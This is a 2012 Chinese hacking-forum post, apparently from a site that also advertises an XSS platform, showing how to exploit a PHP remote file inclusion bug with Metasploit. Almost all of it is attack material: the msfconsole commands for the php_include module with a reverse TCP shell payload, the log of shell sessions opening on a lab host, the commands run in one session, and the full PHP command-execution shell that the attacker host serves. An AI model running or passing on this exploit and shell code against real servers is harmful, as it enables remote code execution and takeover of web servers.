切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
242 PHP文件包含漏洞 Metasploit[复制链接]
发表于 2012-8-29 01:48:33 | 显示全部楼层 |!read_mode!

原理: METASPLOIT生成PHP 或者PYTHON的DOOR EG: http://5.5.5.3:1111/1.txt
然后/lfi.php?file=http://5.5.5.3:1111/1.txt

启动METASPLOIT


  1. msf > use exploit/unix/webapp/php_include
  2. msf  exploit(php_include) > set RHOST 5.5.5.2
  3. RHOST => 5.5.5.2
  4. msf  exploit(php_include) > set PATH /
  5. PATH => /
  6. msf  exploit(php_include) > set PHPURI lif.php?file=/etc/passwd
  7. PHPURI => lif.php?file=/etc/passwd
  8. msf  exploit(php_include) > set URIPATH /1.txt
  9. URIPATH => /1.txt
  10. msf  exploit(php_include) > set PAYLOAD generic/shell_reverse_tcp
  11. PAYLOAD => generic/shell_reverse_tcp
  12. msf  exploit(php_include) > exploit

  13. [*] Started reverse handler on 5.5.5.3:4444
  14. [*] Using URL: http://5.5.5.3:1111/1.txt
  15. [*] PHP include server started.
  16. [*] Command shell session 2 opened (5.5.5.3:4444 -> 5.5.5.2:46452) at 2012-08-16 23:26:33 -0700
  17. [*] Command shell session 3 opened (5.5.5.3:4444 -> 5.5.5.2:46454) at 2012-08-16 23:26:34 -0700
  18. [*] Command shell session 4 opened (5.5.5.3:4444 -> 5.5.5.2:46456) at 2012-08-16 23:26:34 -0700
  19. [*] Command shell session 5 opened (5.5.5.3:4444 -> 5.5.5.2:46458) at 2012-08-16 23:26:34 -0700
  20. [*] Command shell session 6 opened (5.5.5.3:4444 -> 5.5.5.2:46460) at 2012-08-16 23:26:35 -0700
  21. [*] Command shell session 7 opened (5.5.5.3:4444 -> 5.5.5.2:46462) at 2012-08-16 23:26:35 -0700
复制代码
连接


  1. msf  exploit(php_include) > sessions -i 2
  2. [*] Starting interaction with 2...

  3. id
  4. uid=33(www-data) gid=33(www-data) groups=33(www-data)
  5. pwd
  6. /var/www
  7. ls -la
  8. total 120
  9. drwxrwxr-x  3 www-data www-data 4096 Aug 13 15:17 .
  10. drwxr-xr-x 14 root     root     4096 Aug  2 19:06 ..
  11. -rw-r--r--  1 www-data www-data   31 Aug  5 01:50 1.pHp5
  12. -rw-r--r--  1 root     root       32 Aug 13 14:56 1.php
  13. -rw-r--r--  1 www-data www-data   31 Aug  5 01:52 1.php3
  14. -rw-r--r--  1 www-data www-data   31 Aug  5 01:52 1.php4
  15. -rw-r--r--  1 www-data www-data   31 Aug  5 01:51 1.php5
  16. -rwxr-xr-x  1 root     root       32 Aug 10 06:07 1.txt
  17. -rwxrwxrwx  1 www-data www-data 2118 Aug  3 22:08 3.php
  18. -rwxrwxrwx  1 www-data www-data 2118 Aug  3 22:08 3.phpf
  19. -rw-r--r--  1 root     root      595 Aug 10 10:11 door.php
  20. -rw-r--r--  1 root     root      119 Aug 10 14:00 door2.php
  21. -rw-r--r--  1 root     root      577 Aug 10 14:09 door3.php
  22. -rwxrwxrwx  1 root     root      124 Aug 11 08:44 h.php
  23. -rw-r--r--  1 root     root       20 Aug 13 14:01 info.php
  24. -rwxr-xr-x  1 root     root       33 Aug 10 06:21 lif.php
  25. -rwxrwxrwx  1 root     root       49 Aug 10 06:12 lif2.php
  26. drwxrwxrwx  5 www-data www-data 4096 Aug 11 07:59 pen
  27. -rw-r--r--  1 root     root     6435 Aug 11 07:55 pen.zip
  28. -rwxr-xr-x  1 root     root       20 Aug 10 06:23 phpinfo.gif
  29. -rwxrwxrwx  1 www-data www-data   20 Aug  2 19:12 phpinfo.php
  30. -rwxr-xr-x  1 root     root       20 Aug 10 06:23 phpinfo.txt
  31. -rwxrwxrwx  1 www-data www-data  565 Aug 13 15:17 shell.php
  32. -rwxrwxrwx  1 www-data www-data  929 Aug  2 19:26 up1.php
  33. -rwxrwxrwx  1 root     root     1129 Aug  2 20:21 up2.php
  34. -rwxrwxrwx  1 root     root      164 Aug  3 22:04 up3.html
  35. -rwxrwxrwx  1 root     root      381 Aug  3 22:04 up3.php
  36. -rwxrwxrwx  1 root     root      164 Aug  5 01:31 up4.html
  37. -rwxrwxrwx  1 root     root      564 Aug  5 01:52 up4.php
复制代码
METASPLOIT的SHELL RE:
  • Using URL: http://5.5.5.3:1111/1.txt


    1. <?php                
    2.                         @set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0);
    3.                         $sNrUh=@ini_get('disable_functions');
    4.                         if(!empty($sNrUh)){
    5.                                 $sNrUh=preg_replace('/[, ]+/', ',', $sNrUh);
    6.                                 $sNrUh=explode(',', $sNrUh);
    7.                                 $sNrUh=array_map('trim', $sNrUh);
    8.                         }else{
    9.                                 $sNrUh=array();
    10.                         }

    11.                 $port=4444;

    12.                 $scl='socket_create_listen';
    13.                 if(is_callable($scl)&&!in_array($scl,$sNrUh)){
    14.                         $sock=@$scl($port);
    15.                 }else{
    16.                         $sock=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
    17.                         $ret=@socket_bind($sock,0,$port);
    18.                         $ret=@socket_listen($sock,5);
    19.                 }
    20.                 $msgsock=@socket_accept($sock);
    21.                 @socket_close($sock);

    22.                 while(FALSE!==@socket_select($r=array($msgsock), $w=NULL, $e=NULL, NULL))
    23.                 {
    24.                         $o = '';
    25.                         $c=@socket_read($msgsock,2048,PHP_NORMAL_READ);
    26.                         if(FALSE===$c){break;}
    27.                         if(substr($c,0,3) == 'cd '){
    28.                                 chdir(substr($c,3,-1));
    29.                         } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
    30.                                 break;
    31.                         }else{

    32.                         if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {
    33.                                 $c=$c." 2>&1\n";
    34.                         }
    35.                         $vRRb='is_callable';
    36.                         $XZMzBLJ='in_array';

    37.                         if($vRRb('exec')and!$XZMzBLJ('exec',$sNrUh)){
    38.                                 $o=array();
    39.                                 exec($c,$o);
    40.                                 $o=join(chr(10),$o).chr(10);
    41.                         }else
    42.                         if($vRRb('popen')and!$XZMzBLJ('popen',$sNrUh)){
    43.                                 $fp=popen($c,'r');
    44.                                 $o=NULL;
    45.                                 if(is_resource($fp)){
    46.                                         while(!feof($fp)){
    47.                                                 $o.=fread($fp,1024);
    48.                                         }
    49.                                 }
    50.                                 @pclose($fp);
    51.                         }else
    52.                         if($vRRb('proc_open')and!$XZMzBLJ('proc_open',$sNrUh)){
    53.                                 $handle=proc_open($c,array(array(pipe,'r'),array(pipe,'w'),array(pipe,'w')),$pipes);
    54.                                 $o=NULL;
    55.                                 while(!feof($pipes[1])){
    56.                                         $o.=fread($pipes[1],1024);
    57.                                 }
    58.                                 @proc_close($handle);
    59.                         }else
    60.                         if($vRRb('system')and!$XZMzBLJ('system',$sNrUh)){
    61.                                 ob_start();
    62.                                 system($c);
    63.                                 $o=ob_get_contents();
    64.                                 ob_end_clean();
    65.                         }else
    66.                         if($vRRb('passthru')and!$XZMzBLJ('passthru',$sNrUh)){
    67.                                 ob_start();
    68.                                 passthru($c);
    69.                                 $o=ob_get_contents();
    70.                                 ob_end_clean();
    71.                         }else
    72.                         if($vRRb('shell_exec')and!$XZMzBLJ('shell_exec',$sNrUh)){
    73.                                 $o=shell_exec($c);
    74.                         }else
    75.                         {
    76.                                 $o=0;
    77.                         }

    78.                         }
    79.                         @socket_write($msgsock,$o,strlen($o));
    80.                 }
    81.                 @socket_close($msgsock);
    82. ?>
    复制代码



  • 操千曲而后晓声,观千剑而后识器。

    代码区

    GMT+8, 2020-9-25 08:12

    Powered by Discuz! X2

    © 2001-2018 Comsenz Inc.

    回顶部